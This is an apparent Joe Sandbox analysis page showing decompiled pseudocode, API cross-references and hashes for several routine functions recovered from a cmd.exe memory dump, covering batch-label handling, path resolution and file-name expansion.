0x001bc55a
0x001bc554
0x001bc583
0x001bc583
0x001bc561
0x001bc568
0x001bc56a
0x001bc56a
0x00000000
0x001bc56a
0x00000000
0x001bc581
0x001bc58c
0x001bc58c
0x001bc58c
0x001bc4de
0x001bc4b9
0x001bc58e
0x001bc596
0x001ca863
0x001ca863
0x001ca868
0x001ca86a
0x001ca86d
0x001ca870
0x00000000
0x001ca870
0x001bc3ae
0x001bc3ae
0x001bc3b1
0x001bc3c0
0x001bc3c2
0x00000000
0x001bc3c2
0x00000000
0x001bc3a8
0x001bc2e7
0x001b5f23
0x001b5f24
0x001b5f31
0x001b5f31
0x001b5ec9
0x001b5ecb
0x001b5ecc
0x001b5ecc
0x001b5ed2
0x00000000
0x00000000
0x001b5eda
0x001b5edd
0x00000000
0x00000000
0x00000000
0x001b5edd
0x00000000
0x001b5ecc
0x001b5ec7
0x001b5eb5
0x001b5ea0
0x00000000

APIs

_wcsnicmp.MSVCRT ref: 001B5EAA
swscanf.MSVCRT ref: 001B5EED

Strings

:EOF, xrefs: 001B5EBD

Memory Dump Source

Source File: 0000000E.00000002.519238609.00000000001B0000.00000040.80000000.00040000.00000000.sdmp, Offset: 001B0000, based on PE: true

Associated: 0000000E.00000002.519773087.00000000001F9000.00000040.80000000.00040000.00000000.sdmpDownload File
Associated: 0000000E.00000002.519818892.00000000001FD000.00000040.80000000.00040000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_1b0000_cmd.jbxd

Similarity

API ID: _wcsnicmpswscanf
String ID: :EOF
API String ID: 1534968528-551370653
Opcode ID: ab15d483ab0ffc6c26b96d7cdc3b24b4d4ed035ad739bdd777c3a424522c53ad
Instruction ID: 0db962733239096b819173428e9625c001061426cb84b99461348733cdf8d7e9
Opcode Fuzzy Hash: ab15d483ab0ffc6c26b96d7cdc3b24b4d4ed035ad739bdd777c3a424522c53ad
Instruction Fuzzy Hash: 50A1F030A042599BDB25DF68C984BFAB7E4FF28304F94402EE842D7290E775DD81C7A1

Uniqueness

Uniqueness Score: -1.00%

Function 001B58A4 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 135
nativeCOMMON

Download Yara Rule

C-Code - Quality: 83%

			E001B58A4() {
				intOrPtr _v8;
				intOrPtr _v16;
				long _v20;
				intOrPtr _v24;
				void _v28;
				void _v32;
				intOrPtr _v36;
				intOrPtr _v40;
				void* __ebx;
				void* __ecx;
				signed int _t22;
				intOrPtr _t29;
				long _t40;
				intOrPtr _t45;
				intOrPtr* _t49;
				intOrPtr* _t57;
				intOrPtr _t60;
				intOrPtr* _t62;
				void* _t67;

				_t44 = _t67;
				_push(_t45);
				_push(_t45);
				_v8 =  *((intOrPtr*)(_t67 + 4));
				_t22 =  *0x1f8064 & 0x000000ff;
				_v24 = _t45;
				_push(0);
				_push(0x1eb8f8);
				_v16 = 0;
				_v20 = 0xc0000001;
				 *0x1dd560 = _t22;
				L001C82C1();
				if(_t22 != 0) {
					_t60 = 1;
					_v16 = 1;
				} else {
					_t48 =  *0x1f3cb8;
					if( *0x1f3cb8 == 0) {
						_t48 = 0x1f3ab0;
					}
					_t51 =  *0x1f3cc0;
					E001C36CB(_t44, _t48,  *0x1f3cc0, 0);
					 *0x1dd56c = 0;
					 *0x1dd5ac = 0;
					 *0x1dd564 = 1;
					 *0x1dd55c = 1;
					 *0x1dd0c0 = 1;
					_t29 =  *0x1dd5dc; // 0x0
					_t49 = 0x24;
					 *0x1dd5a8 = 0;
					 *0x1dd5a4 = 0;
					 *0x1dd568 = _t29;
					_t62 = E001C00B0(_t49);
					if(_t62 == 0) {
						L14:
						E001D9287(_t49);
						__imp__longjmp(0x1eb8b8, 1);
						goto L15;
					} else {
						 *_t62 = 0;
						 *((intOrPtr*)(_t62 + 0x1c)) = 0;
						_t49 = 0x24;
						_v36 = _t62;
						 *((intOrPtr*)(_t62 + 0x20)) = 0;
						_t57 = E001C00B0(_t49);
						if(_t57 == 0) {
							goto L14;
						} else {
							 *_t57 = 0;
							 *((intOrPtr*)(_t57 + 0x1c)) = 0;
							_v40 = _t57;
							 *((intOrPtr*)(_t57 + 0x20)) = 0;
							E001B450B(_v24, _t62, _t57);
							_t40 = NtQueryInformationProcess(0xffffffff, 0x27,  &_v32, 4, 0);
							_v20 = _t40;
							if(_t40 >= 0) {
								_v28 = 2;
								NtSetInformationProcess(0xffffffff, 0x27,  &_v28, 4);
							}
							_t51 = _t57;
							_t49 = _t62;
							if( *0x1dd55c == 4) {
								L15:
								E001D8664(_t49, _t51);
								_t60 = _v16;
							} else {
								_t60 = E001B48E6(_t49, _t51);
								_v16 = _t60;
							}
						}
					}
					E001C274C(0x1f3d00, 0x104, L"%9d",  *0x1dd56c);
					E001BC108(_t49, 0x2336, 1, 0x1f3d00);
					 *0x1dd560 =  *0x1f8064 & 0x000000ff;
				}
				if(_v20 >= 0) {
					NtSetInformationProcess(0xffffffff, 0x27,  &_v32, 4);
				}
				return _t60;
			}

0x001b58a7
0x001b58a9
0x001b58aa
0x001b58b5
0x001b58be
0x001b58c9
0x001b58cc
0x001b58cd
0x001b58d2
0x001b58d5
0x001b58dc
0x001b58e1
0x001b58ea
0x001c97fc
0x001c97fd
0x001b58f0
0x001b58f0
0x001b58f8
0x001c9805
0x001c9805
0x001b58fe
0x001b5905
0x001b590c
0x001b5913
0x001b591b
0x001b5920
0x001b5925
0x001b592a
0x001b592f
0x001b5930
0x001b5936
0x001b593c
0x001b5946
0x001b594a
0x001c980f
0x001c980f
0x001c981b
0x00000000
0x001b5950
0x001b5950
0x001b5954
0x001b5957
0x001b5958
0x001b595b
0x001b5963
0x001b5967
0x00000000
0x001b596d
0x001b5972
0x001b5976
0x001b597a
0x001b597d
0x001b5980
0x001b5991
0x001b5997
0x001b599c
0x001b59a3
0x001b59af
0x001b59af
0x001b59bc
0x001b59be
0x001b59c0
0x001c9821
0x001c9821
0x001c9826
0x001b59c6
0x001b59cb
0x001b59cd
0x001b59cd
0x001b59c0
0x001b5967
0x001b59e6
0x001b59f3
0x001b5a02
0x001b5a02
0x001b5a0b
0x001b5a17
0x001b5a17
0x001b5a27

APIs

_setjmp3.MSVCRT ref: 001B58E1

Part of subcall function 001C36CB: GetCurrentDirectoryW.API-MS-WIN-CORE-PROCESSENVIRONMENT-L1-1-0(?,?,00000000,?,001B590A,00000000), ref: 001C36F0

Part of subcall function 001C00B0: GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(00000008,?,?,001BDF68,00000001,?,00000000,001C3458,-00000105,001DBDD8,00000240,001C4B82,00000000,00000000,001CAE6E,00000000), ref: 001C00C1
Part of subcall function 001C00B0: HeapAlloc.API-MS-WIN-CORE-HEAP-L1-1-0(00000000,?,001BDF68,00000001,?,00000000,001C3458,-00000105,001DBDD8,00000240,001C4B82,00000000,00000000,001CAE6E,00000000,?), ref: 001C00C8

NtQueryInformationProcess.NTDLL ref: 001B5991
NtSetInformationProcess.NTDLL(000000FF,00000027,?,00000004), ref: 001B59AF
NtSetInformationProcess.NTDLL(000000FF,00000027,?,00000004), ref: 001B5A17
longjmp.MSVCRT(001EB8B8,00000001,00000000), ref: 001C981B

Strings

%9d, xrefs: 001B59DB

Memory Dump Source

Source File: 0000000E.00000002.519238609.00000000001B0000.00000040.80000000.00040000.00000000.sdmp, Offset: 001B0000, based on PE: true

Associated: 0000000E.00000002.519773087.00000000001F9000.00000040.80000000.00040000.00000000.sdmpDownload File
Associated: 0000000E.00000002.519818892.00000000001FD000.00000040.80000000.00040000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_1b0000_cmd.jbxd

Similarity

API ID: Process$Information$Heap$AllocCurrentDirectoryQuery_setjmp3longjmp
String ID: %9d
API String ID: 4212706909-2241623522
Opcode ID: 77514e8a3054d0785039f138c1fcb8448e4d2b2f006dec707efbbd52c5c152a8
Instruction ID: 68226e370be2a2b941553985b032a2799a49564d3bd4657b12c5f2239ea7a3f2
Opcode Fuzzy Hash: 77514e8a3054d0785039f138c1fcb8448e4d2b2f006dec707efbbd52c5c152a8
Instruction Fuzzy Hash: BF41D0B0A01314EFD710EF69AC46B6ABBF4EB54714F10421EE614E7690EB709981CF91

Uniqueness

Uniqueness Score: -1.00%

Function 001B5226 Relevance: 9.5, APIs: 6, Instructions: 458
COMMONCrypto

Download Yara Rule

C-Code - Quality: 85%

			E001B5226(intOrPtr __ecx, signed int __edx) {
				intOrPtr _v8;
				signed int _v16;
				long _v28;
				char _v32;
				LPWSTR* _v36;
				void _v556;
				signed int _v560;
				signed short** _v564;
				WCHAR* _v568;
				LPWSTR* _v572;
				intOrPtr _v576;
				LPWSTR* _v580;
				signed int _v584;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t146;
				signed short** _t160;
				intOrPtr _t164;
				LPWSTR* _t165;
				intOrPtr _t167;
				intOrPtr _t169;
				signed int _t176;
				void* _t179;
				signed short** _t183;
				intOrPtr _t186;
				intOrPtr _t187;
				intOrPtr _t188;
				intOrPtr _t190;
				signed int _t194;
				void* _t195;
				signed short _t197;
				intOrPtr _t199;
				void* _t205;
				void* _t207;
				void* _t209;
				signed short _t211;
				void* _t213;
				WCHAR* _t222;
				signed short* _t225;
				intOrPtr* _t226;
				void* _t228;
				intOrPtr _t230;
				signed short* _t235;
				signed int _t236;
				intOrPtr* _t244;
				short* _t247;
				void* _t248;
				intOrPtr* _t249;
				intOrPtr* _t256;
				intOrPtr* _t259;
				void* _t262;
				intOrPtr* _t263;
				signed short* _t266;
				signed short* _t267;
				intOrPtr* _t269;
				signed int _t273;
				signed int _t276;
				signed short* _t280;
				void* _t288;
				signed short* _t289;
				void* _t292;
				short* _t293;
				void* _t297;
				short _t298;
				intOrPtr* _t299;
				intOrPtr* _t303;
				signed int _t306;
				signed short* _t307;
				void* _t314;
				intOrPtr* _t316;
				intOrPtr* _t322;
				LPWSTR* _t324;
				void* _t325;
				void* _t326;
				WCHAR* _t327;
				void* _t328;
				void* _t331;
				intOrPtr _t333;
				void* _t334;
				intOrPtr _t336;
				intOrPtr* _t340;
				intOrPtr* _t341;
				short* _t344;
				void* _t346;
				intOrPtr* _t347;
				signed int _t349;
				intOrPtr _t353;
				intOrPtr _t357;
				signed int _t363;

				_t295 = __edx;
				_t236 = _t363;
				_push(__ecx);
				_push(__ecx);
				_v8 =  *((intOrPtr*)(_t236 + 4));
				_t361 = (_t363 & 0xfffffff8) + 4;
				_t146 =  *0x1dd0b4; // 0xea614d48
				_v16 = _t146 ^ (_t363 & 0xfffffff8) + 0x00000004;
				_t322 =  *((intOrPtr*)(_t236 + 8));
				_t333 = __ecx;
				_v28 = 0x104;
				_v584 = __edx;
				_v576 = __ecx;
				_v568 = _t322;
				_v572 = 0;
				_v580 = 0;
				_v36 = 0;
				_v32 = 1;
				memset( &_v556, 0, 0x104);
				if(E001C0C70( &_v556, ((0 | _v32 == 0x00000000) - 0x00000001 & 0x00007ee3) + 0x104) < 0) {
					_t324 = 1;
					L25:
					__imp__??_V@YAXPAX@Z(_v36);
					_pop(_t325);
					_pop(_t334);
					return E001C6FD0(_t324, _t236, _v16 ^ _t361, _t295, _t325, _t334);
				}
				_t160 =  *(_v584 + 0x20);
				_v564 = _t160;
				if(_t160 == 0) {
					_t161 =  *0x1f3cb8;
					if( *0x1f3cb8 == 0) {
						_t161 = 0x1f3ab0;
					}
					E001C1040(_t322,  *(_t236 + 0xc), _t161);
					_t244 = _t322;
					_v572 = 0;
					_t326 = 2;
					_t297 = _t244 + 2;
					do {
						_t164 =  *_t244;
						_t244 = _t244 + _t326;
					} while (_t164 != 0);
					_t165 = _v568;
					_t336 = _v576;
					_t298 = 0x5c;
					_t247 = _t165 + (_t244 - _t297 >> 1) * 2;
					if(_t165 >= _t247) {
						L38:
						 *_t247 = _t298;
						 *((short*)(_t247 + 2)) = 0;
						L39:
						if(( *(_t336 + 0x1c) & 0x00000200) == 0) {
							L54:
							_t299 = _v568;
							_t248 = _t299 + 2;
							do {
								_t167 =  *_t299;
								_t299 = _t299 + _t326;
							} while (_t167 != 0);
							_v572 = _t299 - _t248 >> 1;
							_t340 =  *((intOrPtr*)(_v576 + 0x18)) + 0x2c;
							_t295 = 0;
							_t249 = _t340;
							_v560 = _t249 + 2;
							do {
								_t169 =  *_t249;
								_t249 = _t249 + _t326;
							} while (_t169 != 0);
							_t327 = _v568;
							if( &(_v572[0]) + (_t249 - _v560 >> 1) > 0x7fe7) {
								L53:
								_t341 = _v564;
								L89:
								_v580 = 1;
								L20:
								if( *((intOrPtr*)(_t236 + 0x10)) == 0) {
									L24:
									_t324 = _v580;
									goto L25;
								}
								if(_t341 == 0 || ( *(_t341 + 0x1c) & 0x00002000) == 0) {
									if(( *(_v584 + 0x1c) & 0x00002000) != 0) {
										goto L90;
									}
								} else {
									L90:
									_t328 = CreateFileW(_t327, 0x80000000, 1, 0, 3, 0x80, 0);
									if(_t328 != 0xffffffff) {
										_t176 = GetFileType(_t328);
										CloseHandle(_t328);
										if((_t176 & 0xffff7fff) == 1) {
											_t344 = _v568;
											_t295 = 0x400023d3;
											_t179 = E001D9583(_t344, 0x400023d3, 0x400023d4);
											if(_t179 == 0) {
												 *_t344 = 0;
											} else {
												if(_t179 == 0) {
													_t183 = _v564;
													if(_t183 == 0) {
														_t183 = _v584;
													}
													 *(_t183 + 0x1c) =  *(_t183 + 0x1c) & 0xffffdfff;
												}
											}
										}
									}
								}
								goto L24;
							}
							_push(_t340);
							L80:
							_t295 =  *(_t236 + 0xc);
							E001C18C0(_t327,  *(_t236 + 0xc));
							_t341 = _v564;
							goto L20;
						}
						_t303 =  *((intOrPtr*)(_t336 + 0x18)) + 0x234;
						_t256 = _t303;
						_v572 = _t303;
						_v560 = _t256 + 2;
						do {
							_t186 =  *_t256;
							_t256 = _t256 + _t326;
						} while (_t186 != 0);
						if(_t256 == _v560) {
							goto L54;
						}
						_t259 = _t303;
						_t295 = 0;
						_t346 = _t259 + 2;
						do {
							_t187 =  *_t259;
							_t259 = _t259 + _t326;
						} while (_t187 != 0);
						if(_t259 == _t346) {
							L52:
							_t327 = _v568;
							goto L53;
						}
						_t347 = _v568;
						_t262 = _t347 + 2;
						do {
							_t188 =  *_t347;
							_t347 = _t347 + _t326;
						} while (_t188 != 0);
						_t263 = _v572;
						_t349 = _t347 - _t262 >> 1;
						_t72 = _t263 + 2; // 0x2
						_v560 = _t72;
						do {
							_t190 =  *_t263;
							_t263 = _t263 + _t326;
						} while (_t190 != 0);
						_t295 = _v572;
						if(_t349 + 1 + (_t263 - _v560 >> 1) > 0x7fe7) {
							goto L52;
						}
						_t327 = _v568;
						_push(_t295);
						goto L80;
					} else {
						goto L33;
					}
					do {
						L33:
						if( *_t165 == _t298) {
							_v572 = _t165;
						}
						_t165 = _t165 + _t326;
					} while (_t165 < _t247);
					if(_v572 == 0 || _v572 < _t247 - 2) {
						goto L38;
					} else {
						goto L39;
					}
				}
				_t266 =  *_t160;
				_t331 = 2;
				_t194 =  *_t266 & 0x0000ffff;
				_t306 = _t194;
				_v560 = _t306;
				if(_t194 == 0) {
					L6:
					_t195 = 0x3a;
					if(_t306 == _t195) {
						if(( *(_t333 + 0x1c) & 0x00000200) == 0) {
							L73:
							_t307 =  *_v564;
							_t267 =  &(_t307[1]);
							do {
								_t197 =  *_t307;
								_t307 = _t307 + _t331;
							} while (_t197 != 0);
							_t295 = _t307 - _t267 >> 1;
							_t269 =  *((intOrPtr*)(_v576 + 0x18)) + 0x2c;
							_v560 = _t269 + 2;
							do {
								_t199 =  *_t269;
								_t269 = _t269 + _t331;
							} while (_t199 != 0);
							_t353 = _v576;
							_t327 = _v568;
							if(_t295 + 1 + (_t269 - _v560 >> 1) > 0x7fe7) {
								goto L53;
							}
							E001C1040(_t327,  *(_t236 + 0xc),  *_v564);
							_t205 =  *((intOrPtr*)(_t353 + 0x18)) + 0x2c;
							L79:
							_push(_t205);
							goto L80;
						}
						_t295 =  *((intOrPtr*)(_t333 + 0x18)) + 0x234;
						_t273 = _t295;
						_v560 = _t273 + 2;
						do {
							_t207 =  *_t273;
							_t273 = _t273 + _t331;
						} while (_t207 != 0);
						if(_t273 == _v560) {
							goto L73;
						}
						_t276 = _t295;
						_v560 = _t276 + 2;
						do {
							_t209 =  *_t276;
							_t276 = _t276 + _t331;
						} while (_t209 != 0);
						if(_t276 == _v560) {
							goto L52;
						}
						_t280 =  *_v564;
						_v560 =  &(_t280[1]);
						do {
							_t211 =  *_t280;
							_t280 = _t280 + _t331;
						} while (_t211 != 0);
						_t357 = _v576;
						_v572 = _t280 - _v560 >> 1;
						_v560 = _t295 + 2;
						do {
							_t213 =  *_t295;
							_t295 = _t295 + _t331;
						} while (_t213 != 0);
						if( &(_v572[0]) + _t295 > 0x7fe7) {
							goto L52;
						}
						_t327 = _v568;
						E001C1040(_t327,  *(_t236 + 0xc),  *_v564);
						_t205 =  *((intOrPtr*)(_t357 + 0x18)) + 0x234;
						goto L79;
					}
					if( *((intOrPtr*)(_t236 + 0x10)) == 0) {
						L17:
						_t341 = _v564;
						_t327 = _v568;
						_t295 =  *(_t236 + 0xc);
						if(E001B5400(_t327,  *(_t236 + 0xc),  *_t341,  *((intOrPtr*)(_t333 + 4))) != 0) {
							E001D985A(_t220);
							_v580 = 1;
						}
						_t222 = _v36;
						if(_t222 == 0) {
							_t222 =  &_v556;
						}
						if(GetFullPathNameW(_t327, _v28, _t222, 0) > 0x7fe7) {
							_t288 = 0x6f;
							E001D985A(_t288);
							goto L89;
						} else {
							goto L20;
						}
					}
					_t313 = _v564;
					_t225 =  *_v564;
					_t289 = _t225;
					if(_v560 == 0) {
						L12:
						if( *_t289 != 0x2a) {
							goto L17;
						}
						_t226 = E001B5846( *_t313);
						_t314 = 0x5c;
						if( *_t226 != _t314) {
							goto L17;
						}
						_t292 = E001C2349( *((intOrPtr*)(_t333 + 4)), _t314);
						if(_t292 == 0) {
							_t293 =  *((intOrPtr*)(_t333 + 4));
							_t228 = 0x3a;
							if( *((intOrPtr*)(_t293 + 2)) == _t228) {
								_t293 = _t293 + 4;
							}
						} else {
							_t293 = _t292 + _t331;
						}
						if(( *(_t333 + 0x1c) & 0x00000200) != 0) {
							_t316 =  *((intOrPtr*)(_t333 + 0x18)) + 0x234;
							_v560 = _t316 + 2;
							do {
								_t230 =  *_t316;
								_t316 = _t316 + _t331;
							} while (_t230 != _v572);
							if(_t316 != _v560) {
								 *_t293 = 0;
								E001C18C0( *((intOrPtr*)(_t333 + 4)),  *((intOrPtr*)(_t333 + 8)),  *((intOrPtr*)(_t333 + 0x18)) + 0x234);
							}
						}
						goto L17;
					} else {
						goto L10;
						L10:
						_t289 = _t225;
						_t225 = _t225 + _t331;
						if( *_t225 != 0) {
							goto L10;
						} else {
							_t333 = _v576;
							goto L12;
						}
					}
				} else {
					goto L4;
					L4:
					_t235 = _t266;
					_t266 = _t266 + _t331;
					if( *_t266 != 0) {
						goto L4;
					} else {
						_t306 =  *_t235 & 0x0000ffff;
						goto L6;
					}
				}
			}

0x001b5226
0x001b5229
0x001b522b
0x001b522c
0x001b5237
0x001b523b
0x001b5243
0x001b524a
0x001b524f
0x001b5257
0x001b5259
0x001b525e
0x001b526c
0x001b5273
0x001b5279
0x001b527f
0x001b5285
0x001b5288
0x001b528c
0x001b52b5
0x001b53f5
0x001b53d2
0x001b53d5
0x001b53e1
0x001b53e4
0x001b53f0
0x001b53f0
0x001b52c1
0x001b52c4
0x001b52cc
0x001c915f
0x001c9166
0x001c9168
0x001c9168
0x001c9173
0x001c9178
0x001c917e
0x001c9186
0x001c9187
0x001c918a
0x001c918a
0x001c918d
0x001c918f
0x001c9194
0x001c919c
0x001c91a6
0x001c91a7
0x001c91ac
0x001c91d3
0x001c91d5
0x001c91d8
0x001c91dc
0x001c91e3
0x001c929f
0x001c929f
0x001c92a7
0x001c92aa
0x001c92aa
0x001c92ad
0x001c92af
0x001c92be
0x001c92c7
0x001c92ca
0x001c92cc
0x001c92d1
0x001c92d7
0x001c92d7
0x001c92da
0x001c92dc
0x001c92ed
0x001c92fd
0x001c9294
0x001c9294
0x001c94f9
0x001c94f9
0x001b53a5
0x001b53a9
0x001b53cc
0x001b53cc
0x00000000
0x001b53cc
0x001b53b2
0x001b53c6
0x00000000
0x00000000
0x001c9508
0x001c9508
0x001c9521
0x001c9526
0x001c952d
0x001c953c
0x001c9547
0x001c954d
0x001c9553
0x001c9566
0x001c9568
0x001c9591
0x001c956a
0x001c956d
0x001c9573
0x001c957b
0x001c957d
0x001c957d
0x001c9583
0x001c9583
0x001c956d
0x001c9568
0x001c9547
0x001c9526
0x00000000
0x001b53b2
0x001c92ff
0x001c9462
0x001c9462
0x001c9467
0x001c946c
0x00000000
0x001c946c
0x001c91ec
0x001c91f4
0x001c91f6
0x001c91ff
0x001c9205
0x001c9205
0x001c9208
0x001c920a
0x001c9217
0x00000000
0x00000000
0x001c921d
0x001c921f
0x001c9221
0x001c9224
0x001c9224
0x001c9227
0x001c9229
0x001c9232
0x001c928e
0x001c928e
0x00000000
0x001c928e
0x001c9234
0x001c923c
0x001c923f
0x001c923f
0x001c9242
0x001c9244
0x001c924b
0x001c9251
0x001c9255
0x001c9258
0x001c925e
0x001c925e
0x001c9261
0x001c9263
0x001c9271
0x001c9280
0x00000000
0x00000000
0x001c9282
0x001c9288
0x00000000
0x00000000
0x00000000
0x00000000
0x001c91ae
0x001c91ae
0x001c91b1
0x001c91b3
0x001c91b3
0x001c91b9
0x001c91bb
0x001c91c6
0x00000000
0x00000000
0x00000000
0x00000000
0x001c91c6
0x001b52d2
0x001b52d6
0x001b52d7
0x001b52da
0x001b52dc
0x001b52e5
0x001b52f5
0x001b52f7
0x001b52fb
0x001c930c
0x001c93e9
0x001c93f1
0x001c93f3
0x001c93f6
0x001c93f6
0x001c93f9
0x001c93fb
0x001c9408
0x001c940d
0x001c9415
0x001c941b
0x001c941b
0x001c941e
0x001c9420
0x001c942e
0x001c9434
0x001c9443
0x00000000
0x00000000
0x001c9456
0x001c945e
0x001c9461
0x001c9461
0x00000000
0x001c9461
0x001c9315
0x001c931d
0x001c9322
0x001c9328
0x001c9328
0x001c932b
0x001c932d
0x001c933a
0x00000000
0x00000000
0x001c9340
0x001c9347
0x001c934d
0x001c934d
0x001c9350
0x001c9352
0x001c935f
0x00000000
0x00000000
0x001c936d
0x001c9372
0x001c9378
0x001c9378
0x001c937b
0x001c937d
0x001c938b
0x001c9393
0x001c939b
0x001c93a1
0x001c93a1
0x001c93a4
0x001c93a6
0x001c93c1
0x00000000
0x00000000
0x001c93cd
0x001c93da
0x001c93e2
0x00000000
0x001c93e2
0x001b5305
0x001b5362
0x001b5365
0x001b536b
0x001b5373
0x001b537f
0x001c94dd
0x001c94e2
0x001c94e2
0x001b5385
0x001b538a
0x001b53f8
0x001b53f8
0x001b539f
0x001c94f3
0x001c94f4
0x00000000
0x00000000
0x00000000
0x00000000
0x001b539f
0x001b530f
0x001b5315
0x001b5317
0x001b5319
0x001b532c
0x001b5330
0x00000000
0x00000000
0x001b5334
0x001b533b
0x001b533f
0x00000000
0x00000000
0x001b5349
0x001b534d
0x001c9477
0x001c947c
0x001c9481
0x001c9487
0x001c9487
0x001b5353
0x001b5353
0x001b5353
0x001b535c
0x001c9492
0x001c949b
0x001c94a1
0x001c94a1
0x001c94a4
0x001c94a6
0x001c94b7
0x001c94bf
0x001c94d1
0x001c94d1
0x001c94b7
0x00000000
0x001b531b
0x001b531b
0x001b531d
0x001b531d
0x001b531f
0x001b5324
0x00000000
0x001b5326
0x001b5326
0x00000000
0x001b5326
0x001b5324
0x001b52e7
0x001b52e7
0x001b52e9
0x001b52e9
0x001b52eb
0x001b52f0
0x00000000
0x001b52f2
0x001b52f2
0x00000000
0x001b52f2
0x001b52f0

APIs

memset.MSVCRT ref: 001B528C

Part of subcall function 001C0C70: ??_V@YAXPAX@Z.MSVCRT ref: 001C0CBA
Part of subcall function 001C0C70: memset.MSVCRT ref: 001C0CDD

GetFullPathNameW.API-MS-WIN-CORE-FILE-L1-1-0(?,?,?,00000000,?,?,-00000105,?,00000000,?), ref: 001B5394
??_V@YAXPAX@Z.MSVCRT ref: 001B53D5

Memory Dump Source

Source File: 0000000E.00000002.519238609.00000000001B0000.00000040.80000000.00040000.00000000.sdmp, Offset: 001B0000, based on PE: true

Associated: 0000000E.00000002.519773087.00000000001F9000.00000040.80000000.00040000.00000000.sdmpDownload File
Associated: 0000000E.00000002.519818892.00000000001FD000.00000040.80000000.00040000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_1b0000_cmd.jbxd

Similarity

API ID: memset$FullNamePath
String ID:
API String ID: 3158150540-0
Opcode ID: 122c32f01fb8953181aa41f1f7ff8fe0b6f9db2ddc4d0d54994ee44f63b8a1a4
Instruction ID: aa5e892919984d6d8c097a19fc073f1b20b4038430b51144c1c467297e637d16
Opcode Fuzzy Hash: 122c32f01fb8953181aa41f1f7ff8fe0b6f9db2ddc4d0d54994ee44f63b8a1a4
Instruction Fuzzy Hash: 7F028135A001159BCB29DF68DC99BA9B3F2BF98314F1981ADD849A7354D734EE82CF40

Uniqueness

Uniqueness Score: -1.00%

Function 001C245C Relevance: 9.2, APIs: 6, Instructions: 154
fileCOMMON

Download Yara Rule

C-Code - Quality: 58%

			E001C245C(WCHAR* __ecx, signed int __edx, intOrPtr _a4) {
				signed int _v8;
				struct _WIN32_FIND_DATAW _v604;
				signed int _v608;
				void _v612;
				signed int _v616;
				void* _v620;
				intOrPtr _v624;
				WCHAR* _v628;
				void* _v632;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t42;
				intOrPtr _t44;
				void* _t45;
				void _t47;
				void* _t53;
				void _t54;
				void _t58;
				char* _t69;
				char* _t71;
				intOrPtr* _t73;
				signed int _t75;
				void* _t76;
				WCHAR* _t77;
				void* _t80;
				void* _t81;
				signed int _t83;
				void* _t84;
				void* _t91;
				void* _t96;
				void* _t97;
				short* _t99;
				void* _t100;
				void* _t101;
				void* _t102;
				void* _t103;
				int _t104;
				void* _t105;
				signed int _t106;
				signed int _t108;

				_t90 = __edx;
				_t77 = __ecx;
				_t108 = (_t106 & 0xfffffff8) - 0x274;
				_t42 =  *0x1dd0b4; // 0xea614d48
				_v8 = _t42 ^ _t108;
				_t73 = __ecx;
				_v616 = __edx;
				_v628 = __ecx;
				_v624 = 0;
				_t99 =  &(__ecx[1]);
				do {
					_t44 =  *_t73;
					_t73 = _t73 + 2;
				} while (_t44 != 0);
				_t75 = _t73 - _t99 >> 1;
				if(_t75 > __edx) {
					L21:
					_t45 = 0;
				} else {
					_t97 =  &(__ecx[3]);
					_t101 = _t97;
					_v632 = _t101;
					do {
						_t47 =  *_t97 & 0x0000ffff;
						_v612 = _t47;
						if(_t47 == 0 || _t47 == 0x5c) {
							 *_t97 = 0;
							_t80 = FindFirstFileW(_t77,  &_v604);
							_t47 = _v612;
							 *_t97 = _t47;
							if(_t80 == 0xffffffff) {
								_t97 = _t97 + 2;
								_t101 = _t97;
								goto L17;
							} else {
								FindClose(_t80);
								if(_v604.cAlternateFileName != 0) {
									if(_a4 != 0) {
										L23:
										_t53 =  &(_v604.cAlternateFileName);
										goto L12;
									} else {
										_t69 =  &(_v604.cAlternateFileName);
										__imp___wcsnicmp(_t69, _t101, _t97 - _t101 >> 1);
										_t108 = _t108 + 0xc;
										if(_t69 != 0) {
											goto L11;
										} else {
											_t71 =  &(_v604.cFileName);
											__imp___wcsicmp(_t71,  &(_v604.cAlternateFileName));
											if(_t71 == 0) {
												goto L11;
											} else {
												goto L23;
											}
										}
									}
									L14:
									_t83 = _t81 - _t91 >> 1;
									_t90 = _t83 - (_t97 - _t101 >> 1);
									_v608 = _t83;
									_t75 = _t75 + _t90;
									if(_t75 >= _v616) {
										goto L21;
									} else {
										if(_t90 > 0) {
											_t84 = _t97;
											_t102 = _t84 + 2;
											do {
												_t58 =  *_t84;
												_t84 = _t84 + 2;
											} while (_t58 != _v624);
											_t103 = _t97 + _t90 * 2;
											memmove(_t103, _t97, 1 + (_t84 - _t102 >> 1) * 2);
											_t83 = _v608;
											_t108 = _t108 + 0xc;
											_t97 = _t103;
										}
										_t104 = _t83 + _t83;
										memcpy(_v632, _v620, _t104);
										_v632 = _v632 + _t104;
										_t108 = _t108 + 0xc;
										_t105 = _v632;
										_t90 = _v616 - (_t105 - _v628 >> 1);
										E001C1040(_t105, _v616 - (_t105 - _v628 >> 1), _t97);
										_t47 = _v616;
										_t101 = _t105 + 2;
										_t97 = _t101;
										L17:
										_t77 = _v628;
										_v632 = _t101;
										goto L6;
									}
									goto L8;
								} else {
									L11:
									_t53 =  &(_v604.cFileName);
								}
								L12:
								_t81 = _t53;
								_v620 = _t53;
								_t91 = _t81 + 2;
								do {
									_t54 =  *_t81;
									_t81 = _t81 + 2;
								} while (_t54 != _v624);
								goto L14;
							}
						} else {
							goto L6;
						}
						goto L8;
						L6:
						_t97 = _t97 + 2;
					} while (_t47 != 0);
					_t45 = 1;
				}
				L8:
				_pop(_t96);
				_pop(_t100);
				_pop(_t76);
				return E001C6FD0(_t45, _t76, _v8 ^ _t108, _t90, _t96, _t100);
			}

0x001c245c
0x001c245c
0x001c2464
0x001c246a
0x001c2471
0x001c247a
0x001c247c
0x001c2483
0x001c2487
0x001c248b
0x001c248e
0x001c248e
0x001c2491
0x001c2494
0x001c249b
0x001c249f
0x001c25d2
0x001c25d2
0x001c24a5
0x001c24a5
0x001c24a8
0x001c24aa
0x001c24ae
0x001c24ae
0x001c24b1
0x001c24b8
0x001c24e3
0x001c24f2
0x001c24f4
0x001c24f8
0x001c24fe
0x001cd671
0x001cd674
0x00000000
